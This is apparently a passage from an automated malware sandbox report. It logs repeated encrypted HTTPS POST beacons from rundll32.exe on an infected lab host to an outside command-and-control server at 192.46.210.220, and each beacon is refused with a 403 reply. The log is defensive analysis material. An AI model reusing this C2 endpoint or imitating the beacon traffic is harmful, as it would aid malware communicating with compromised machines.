                                                                                                              2021-10-28 02:50:41 UTC254OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:42 UTC259INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:42 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              52192.168.2.450041192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:45 UTC259OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:45 UTC259OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:45 UTC269INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:45 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              53192.168.2.450042192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:45 UTC264OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:45 UTC264OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:46 UTC269INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:46 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              54192.168.2.450049192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:49 UTC269OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:49 UTC269OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:49 UTC279INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:49 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              55192.168.2.450050192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:49 UTC274OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:49 UTC274OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:50 UTC279INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:50 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              56192.168.2.450063192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:52 UTC279OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:52 UTC279OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:53 UTC289INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:53 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              57192.168.2.450065192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:53 UTC284OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:53 UTC284OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:54 UTC289INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:53 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              58192.168.2.450085192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:56 UTC289OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:56 UTC289OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:57 UTC299INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:57 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              59192.168.2.450087192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:50:57 UTC294OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:50:57 UTC294OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:50:58 UTC299INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:50:58 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.2.449807192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:49:13 UTC29OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:49:13 UTC30OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:49:14 UTC34INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:49:14 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              60192.168.2.450097192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:00 UTC299OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:00 UTC299OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:01 UTC309INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:01 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              61192.168.2.450098192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:01 UTC304OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:01 UTC304OUTData Raw: 75 b8 8f 84 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: u'V^N=rFPflH,=N+_*O$?EkY=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:02 UTC309INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:01 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              62192.168.2.450105192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:04 UTC309OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4853
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
                                                                                                              2021-10-28 02:51:04 UTC309OUTData Raw: d3 b3 80 7a 10 00 27 a1 56 b5 5e a3 4e 3d 1d c5 e7 ab 72 ac fa a9 ff 12 07 46 d0 9c d8 50 91 1b a3 a2 e8 66 6c 03 8a e6 c2 a9 f5 bf d3 48 9e 89 a5 e0 2c 3d c4 05 1b 4e 0a 2b 88 5f 2a 4f 24 a2 3f ad 97 05 45 a7 6b 90 59 bf d6 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                              Data Ascii: z'V^N=rFPflH,=N+_*O$?EkY=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                              2021-10-28 02:51:05 UTC319INHTTP/1.1 403 Forbidden
                                                                                                              Server: nginx/1.15.12
                                                                                                              Date: Thu, 28 Oct 2021 02:51:05 GMT
                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              63192.168.2.450106192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              2021-10-28 02:51:05 UTC314OUTPOST / HTTP/1.1
                                                                                                              Host: 192.46.210.220
                                                                                                              Content-Length: 4865
                                                                                                              Connection: Close
                                                                                                              Cache-Control: no-cache
